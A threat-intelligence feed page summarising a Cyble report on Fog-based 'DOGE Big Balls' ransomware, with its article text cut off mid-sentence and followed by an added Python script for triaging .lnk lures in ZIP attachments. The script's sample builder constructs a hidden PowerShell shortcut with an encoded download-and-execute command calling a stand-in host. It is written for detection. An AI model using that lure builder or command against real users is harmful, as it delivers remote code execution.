One Article Review

Home - The article:
Source Cyble
Identifier 8662673
Publication date 2025-04-14 12:58:44 (viewed: 2025-04-14 13:07:04)
Title DOGE “Big Balls” Ransomware and the False Connection to Edward Coristine
Text
Cyble: 'DOGE BIG BALLS' Ransomware and the False Connection to Edward Coristine

Key Takeaways
- This attack leverages a ZIP file with a deceptive LNK shortcut to silently execute a multi-stage PowerShell-based infection chain, ensuring stealthy deployment.
- A vulnerable driver (CVE-2015-2291) is exploited through a Bring Your Own Vulnerable Driver (BYOVD) technique to gain kernel-level read/write access for privilege escalation.
- The payload is a customized version of Fog ransomware, branded as "DOGE BIG BALLS Ransomware," reflecting an attempt to add psychological manipulation and misattribution.
- Ransomware scripts include provocative political commentary and the use of a real individual's name and address, indicating intent to confuse, intimidate, or mislead victims.
- The malware uses router MAC addresses (BSSIDs) and queries the Wigle.net API to determine the victim's physical location, offering more accurate geolocation than IP-based methods.
- Extensive system and network information, including hardware IDs, firewall states, network configuration, and running processes, is collected via PowerShell, aiding attacker profiling.
- Embedded within the toolkit is a Havoc C2 beacon, hinting at the threat actor's (TA's) potential to maintain long-term access or conduct additional post-encryption activities.

Overview:
A recent ransomware operation has revealed a blend of technical sophistication and psychological manipulation, setting it apart from conventional attacks. Disguised under a finance-themed ZIP file, the campaign employs deceptive shortcut files and multi-stage PowerShell scripts to deliver custom payloads, including a kernel-mode exploit tool and reconnaissance modules. This layered approach allows attackers to gat
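The first link of the chain described above, a finance-themed ZIP carrying a shortcut that launches a hidden, multi-stage PowerShell run, is also the easiest one to triage at a mail gateway or in a sandbox. The following Python is an added example, not Cyble's code or anything from the original article: it constructs a sample archive (the member name Invoice_Q1.pdf.lnk, the stage-1 download command and the host stage1.example.invalid are invented for this illustration), parses the Shell Link header and StringData fields as laid out in MS-SHLLINK, and reports why each .lnk entry looks like a lure, decoding any -EncodedCommand payload it carries.

```python
"""Triage a ZIP attachment for .lnk lures that launch PowerShell (added example, not Cyble's code).
Layout follows MS-SHLLINK: 76-byte ShellLinkHeader, optional IDList/LinkInfo, then StringData."""
import base64, io, re, struct, zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-000000000046} on disk
HEADER = "<I16sIIQQQIiIHHII"                                     # ShellLinkHeader, 76 bytes
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))  # LinkFlags bit -> field, file order
SW_SHOWMINNOACTIVE = 7                                           # minimised, unfocused window
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

def build_lnk(relative_path, arguments, show_command=1):
    """Minimal Unicode shortcut with only RELATIVE_PATH and ARGUMENTS (used to construct samples)."""
    header = struct.pack(HEADER, 0x4C, LNK_CLSID, 0x08 | 0x20 | IS_UNICODE, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")  # CountCharacters + chars
    return header + sd(relative_path) + sd(arguments)

def parse_lnk(data):
    """Return (link_flags, show_command, string_fields) or raise ValueError."""
    if len(data) < 0x4C or data[:4] != b"L\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link")
    flags, show_command = struct.unpack_from("<I", data, 20)[0], struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_IDLIST:                 # IDListSize (u16) + item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:               # LinkInfoSize (u32) covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += 2 + count * width
    return flags, show_command, fields

def decode_encoded_command(arguments):
    """-EncodedCommand carries base64 of UTF-16LE script text; None if absent or malformed."""
    m = ENC_RE.search(arguments)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def triage_lnk(entry_name, data):
    """Score one shortcut; each reason is a hallmark of the LNK-in-ZIP lure."""
    _, show_command, f = parse_lnk(data)
    launch = f.get("relative_path", "") + " " + f.get("arguments", "")
    reasons = []
    if re.search(r"\.(?:pdf|docx?|xlsx?)\.lnk$", entry_name, re.I):
        reasons.append("double extension")
    if re.search(r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript", launch, re.I):
        reasons.append("script host launched")
    if show_command == SW_SHOWMINNOACTIVE or re.search(r"-w(?:indowstyle)?\s+h", launch, re.I):
        reasons.append("hidden window")
    decoded = decode_encoded_command(f.get("arguments", ""))
    if decoded is not None:
        reasons.append("encoded command")
    return {"entry": entry_name, "target": f.get("relative_path"), "arguments": f.get("arguments"),
            "decoded": decoded, "reasons": reasons}

def triage_zip(zip_bytes):
    """One finding per .lnk member; other members are ignored."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".lnk"):
                try:
                    findings.append(triage_lnk(info.filename, zf.read(info)))
                except ValueError as exc:
                    findings.append({"entry": info.filename, "decoded": None, "reasons": [str(exc)]})
    return findings

def build_sample_zip():
    """Constructed invoice-themed lure; the name, target and URL are invented for this example."""
    stage1 = "IEX (New-Object Net.WebClient).DownloadString('https://stage1.example.invalid/s1')"
    encoded = base64.b64encode(stage1.encode("utf-16-le")).decode()
    lnk = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    f"-NoProfile -WindowStyle Hidden -EncodedCommand {encoded}", SW_SHOWMINNOACTIVE)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_Q1.pdf.lnk", lnk)
        zf.writestr("README.txt", "constructed filler, not a shortcut")
    return buf.getvalue()

if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding["entry"], "->", ", ".join(finding["reasons"]) or "no indicators")
        print("  decoded stage-1:", finding["decoded"])
```

The parser deliberately reads only the header and StringData: the target path and arguments are all a gateway needs to decide, and skipping IDList and LinkInfo by their declared sizes avoids walking attacker-controlled structures. A real lure usually sets ShowCommand to 7 (minimised, no focus) as well as passing -WindowStyle Hidden, so both checks are kept; the four reasons together are a strong signal even before the stage-1 URL is inspected.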
Rating ★★★
Sent Yes
Tags Ransomware Spam Malware Tool Threat Cloud Technical


The article does not appear to have been picked up after its publication.

The article does not appear to have been picked up from an earlier article.